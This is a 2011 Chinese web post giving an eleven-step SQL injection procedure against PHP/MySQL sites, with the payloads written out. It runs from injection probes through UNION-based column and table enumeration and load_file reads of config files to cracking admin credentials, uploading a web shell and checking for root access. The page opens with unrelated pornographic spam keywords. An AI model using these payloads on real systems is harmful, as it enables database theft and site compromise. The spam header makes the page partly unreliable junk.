欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

php注入基本步驟小結

  發(fā)布時間:2011-04-01 00:43:02   作者:佚名   我要評論
php注入基本步驟小結,我們在編寫代碼的時候一定要注意注入點。
php注入十點基本步驟

1、判斷是否存在注入,加'、and 1=1、and 1=2

2、判斷版本and ord(mid(version(),1,1))>51/* 返回正常說明是4.0以上版本,可以用union查詢

3、利用order by 暴字段,在網址后加 order by 10/* 如果返回正常說明字段大于10

4、再利用union來查詢準確字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常報出數(shù)字,說明猜到準確字段數(shù)。如過濾了空格可以用/**/代替。

(可在分別用user()、database()、version()進行替換報出的數(shù)字進而查看信息)

5、判斷數(shù)據(jù)庫連接帳號有沒有寫權限,and (select count(*) from mysql.user)>0/* 如果結果返回錯誤,那我們只能猜解管理員帳號和密碼了。

6、如果返回正常,則可以通過and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路徑的ascii值,用逗號隔開)),8,9,10 /* 注:load_file(char(文件路徑的ascii值,用逗號隔開))也可以用十六進制,通過這種方式讀取配置文件,找到數(shù)據(jù)庫連接等。

7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,說明存在這個表。

8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按報出的數(shù)字進行替換

9、同理再猜解password字段,猜解成功再找后臺登錄。

10、登錄后臺,上傳shell。

11、檢測是不是root權限 and/**/ord(mid(user(),1,1))=114/*

相關文章

最新評論